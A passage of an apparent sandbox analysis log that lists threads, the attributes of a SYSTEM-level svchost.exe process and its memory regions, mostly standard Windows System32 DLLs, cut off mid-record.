filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe")
Region:
id = 1893
start_va = 0x1f00000
end_va = 0x204cfff
monitored = 0
entry_point = 0x1f43da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Thread:
id = 113
os_tid = 0xc04
Thread:
id = 114
os_tid = 0xc90
Thread:
id = 115
os_tid = 0x808
Thread:
id = 116
os_tid = 0x6ec
Thread:
id = 117
os_tid = 0x5ec
Thread:
id = 118
os_tid = 0xb54
Thread:
id = 119
os_tid = 0x4c8
Thread:
id = 120
os_tid = 0xcd0
Thread:
id = 121
os_tid = 0xc24
Thread:
id = 122
os_tid = 0xff0
Thread:
id = 123
os_tid = 0xf90
Thread:
id = 124
os_tid = 0xef4
Thread:
id = 125
os_tid = 0x470
Thread:
id = 126
os_tid = 0x468
Thread:
id = 127
os_tid = 0x440
Thread:
id = 128
os_tid = 0x43c
Thread:
id = 129
os_tid = 0x434
Thread:
id = 130
os_tid = 0x158
Thread:
id = 131
os_tid = 0x2f0
Thread:
id = 132
os_tid = 0x2cc
Thread:
id = 133
os_tid = 0x168
Thread:
id = 134
os_tid = 0x2d0
Thread:
id = 135
os_tid = 0x210
Thread:
id = 136
os_tid = 0x374
Process:
id = "7"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x73278000"
os_pid = "0x360"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000aea9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1996
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1997
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1998
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1999
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2000
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2001
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2002
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2003
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2004
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2005
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2006
start_va = 0x7ff61f760000
end_va = 0x7ff61f76cfff
monitored = 0
entry_point = 0x7ff61f763980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2007
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2124
start_va = 0x150000
end_va = 0x156fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2125
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2126
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2127
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2128
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2129
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2130
start_va = 0x500000
end_va = 0x5bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2131
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2132
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2133
start_va = 0x160000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2134
start_va = 0x7ff85d180000
end_va = 0x7ff85d273fff
monitored = 0
entry_point = 0x7ff85d18a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2135
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2136
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2137
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2138
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2139
start_va = 0x5c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 2140
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 2141
start_va = 0x700000
end_va = 0x7dcfff
monitored = 0
entry_point = 0x75e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2142
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2143
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2144
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2145
start_va = 0x700000
end_va = 0x887fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 2146
start_va = 0x890000
end_va = 0xa10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000890000"
filename = ""
Region:
id = 2147
start_va = 0xa20000
end_va = 0xadffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a20000"
filename = ""
Region:
id = 2148
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 2149
start_va = 0x110000
end_va = 0x110fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 2150
start_va = 0x120000
end_va = 0x120fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 2151
start_va = 0x130000
end_va = 0x130fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2152
start_va = 0xae0000
end_va = 0xedafff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ae0000"
filename = ""
Region:
id = 2153
start_va = 0xee0000
end_va = 0x10b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 2154
start_va = 0x10c0000
end_va = 0x12bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010c0000"
filename = ""
Region:
id = 2155
start_va = 0x1100000
end_va = 0x11fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 2156
start_va = 0xee0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 2157
start_va = 0x10b0000
end_va = 0x10b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 2158
start_va = 0x7ff858e50000
end_va = 0x7ff858f9cfff
monitored = 0
entry_point = 0x7ff858e93da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 2159
start_va = 0x7ff85ca50000
end_va = 0x7ff85ca5bfff
monitored = 0
entry_point = 0x7ff85ca52480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 2160
start_va = 0x7ff858e30000
end_va = 0x7ff858e47fff
monitored = 0
entry_point = 0x7ff858e35910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2161
start_va = 0x7ff858e20000
end_va = 0x7ff858e29fff
monitored = 0
entry_point = 0x7ff858e21660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 2162
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2163
start_va = 0x1200000
end_va = 0x1342fff
monitored = 0
entry_point = 0x1228210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2164
start_va = 0x1200000
end_va = 0x1316fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 2165
start_va = 0x1320000
end_va = 0x151ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001320000"
filename = ""
Region:
id = 2166
start_va = 0x1400000
end_va = 0x14fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2167
start_va = 0x1500000
end_va = 0x1836fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2168
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 2169
start_va = 0x1310000
end_va = 0x1316fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001310000"
filename = ""
Region:
id = 2170
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 2171
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2172
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2173
start_va = 0x7ff858a90000
end_va = 0x7ff858b4efff
monitored = 0
entry_point = 0x7ff858ab1c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 2174
start_va = 0x1840000
end_va = 0x193ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001840000"
filename = ""
Region:
id = 2175
start_va = 0x7ff85dcc0000
end_va = 0x7ff85dcecfff
monitored = 0
entry_point = 0x7ff85dcd9d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2176
start_va = 0x7ff8584c0000
end_va = 0x7ff858500fff
monitored = 0
entry_point = 0x7ff8584d7eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 2177
start_va = 0x7ff858510000
end_va = 0x7ff85860bfff
monitored = 0
entry_point = 0x7ff858546df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 2178
start_va = 0x7ff85de50000
end_va = 0x7ff85de68fff
monitored = 0
entry_point = 0x7ff85de55e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 2179
start_va = 0x5c0000
end_va = 0x5d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 2180
start_va = 0x1940000
end_va = 0x1b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 2181
start_va = 0x1a00000
end_va = 0x1afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 2182
start_va = 0x7ff85d280000
end_va = 0x7ff85d2c8fff
monitored = 0
entry_point = 0x7ff85d28a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 2183
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2184
start_va = 0x7ff8584a0000
end_va = 0x7ff8584b0fff
monitored = 0
entry_point = 0x7ff8584a3320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 2185
start_va = 0x1b00000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 2186
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2187
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2188
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2189
start_va = 0xee0000
end_va = 0xf5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 2190
start_va = 0xf60000
end_va = 0x105ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f60000"
filename = ""
Region:
id = 2191
start_va = 0x1c00000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c00000"
filename = ""
Region:
id = 2192
start_va = 0x7ff858200000
end_va = 0x7ff85826dfff
monitored = 0
entry_point = 0x7ff858207f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 2193
start_va = 0x7ff8581b0000
end_va = 0x7ff8581f1fff
monitored = 0
entry_point = 0x7ff8581b27d0
region_type = mapped_file
name = "mstask.dll"
filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll")
Region:
id = 2194
start_va = 0x1f0000
end_va = 0x1f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2195
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 2196
start_va = 0x7ff857ee0000
end_va = 0x7ff857fa7fff
monitored = 0
entry_point = 0x7ff857f213f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 2197
start_va = 0x7ff857fb0000
end_va = 0x7ff858010fff
monitored = 0
entry_point = 0x7ff857fb4b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 2198
start_va = 0x7ff858020000
end_va = 0x7ff85819bfff
monitored = 0
entry_point = 0x7ff858071650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 2199
start_va = 0x7ff8581a0000
end_va = 0x7ff8581aafff
monitored = 0
entry_point = 0x7ff8581a1770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 2200
start_va = 0x7ff858b90000
end_va = 0x7ff858c21fff
monitored = 0
entry_point = 0x7ff858bda780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 2201
start_va = 0x7ff858d70000
end_va = 0x7ff858da5fff
monitored = 0
entry_point = 0x7ff858d80070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2202
start_va = 0x7ff85c890000
end_va = 0x7ff85c8cffff
monitored = 0
entry_point = 0x7ff85c8a1960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 2203
start_va = 0x7ff85e030000
end_va = 0x7ff85e03ffff
monitored = 0
entry_point = 0x7ff85e0356e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2204
start_va = 0x7ff85ebf0000
end_va = 0x7ff85edb6fff
monitored = 0
entry_point = 0x7ff85ec4db80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2205
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2206
start_va = 0x7ff85fae0000
end_va = 0x7ff85fb4afff
monitored = 0
entry_point = 0x7ff85faf90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2207
start_va = 0x1320000
end_va = 0x13fcfff
monitored = 0
entry_point = 0x137e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2208
start_va = 0x7ff85d530000
end_va = 0x7ff85d560fff
monitored = 0
entry_point = 0x7ff85d537d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2209
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 2210
start_va = 0x1320000
end_va = 0x139ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001320000"
filename = ""
Region:
id = 2211
start_va = 0x1f00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 2212
start_va = 0x1940000
end_va = 0x19bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 2213
start_va = 0x7ff857ed0000
end_va = 0x7ff857edffff
monitored = 0
entry_point = 0x7ff857ed2c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 2214
start_va = 0x7ff857ea0000
end_va = 0x7ff857ecefff
monitored = 0
entry_point = 0x7ff857ea8910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 2215
start_va = 0x7ff857e90000
end_va = 0x7ff857e9cfff
monitored = 0
entry_point = 0x7ff857e92ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 2216
start_va = 0x2000000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 2217
start_va = 0x7ff85d910000
end_va = 0x7ff85d96bfff
monitored = 0
entry_point = 0x7ff85d926f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2218
start_va = 0x2080000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002080000"
filename = ""
Region:
id = 2219
start_va = 0x5c0000
end_va = 0x5c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 2220
start_va = 0x5d0000
end_va = 0x5d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 2221
start_va = 0x7ff857e30000
end_va = 0x7ff857e84fff
monitored = 0
entry_point = 0x7ff857e3fc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 2222
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2223
start_va = 0x7ff85c6f0000
end_va = 0x7ff85c702fff
monitored = 0
entry_point = 0x7ff85c6f2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2224
start_va = 0x7ff85d350000
end_va = 0x7ff85d3a5fff
monitored = 0
entry_point = 0x7ff85d360bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2225
start_va = 0x2180000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 2226
start_va = 0x7ff857e20000
end_va = 0x7ff857e2bfff
monitored = 0
entry_point = 0x7ff857e214d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 2227
start_va = 0x7ff857df0000
end_va = 0x7ff857e16fff
monitored = 0
entry_point = 0x7ff857df3bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 2228
start_va = 0x7ff85f620000
end_va = 0x7ff85f67bfff
monitored = 0
entry_point = 0x7ff85f63b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2229
start_va = 0x7ff85fd40000
end_va = 0x7ff86129efff
monitored = 0
entry_point = 0x7ff85fea11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2230
start_va = 0x7ff85e3c0000
end_va = 0x7ff85e402fff
monitored = 0
entry_point = 0x7ff85e3d4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2231
start_va = 0x7ff85e5a0000
end_va = 0x7ff85ebe3fff
monitored = 0
entry_point = 0x7ff85e7664b0
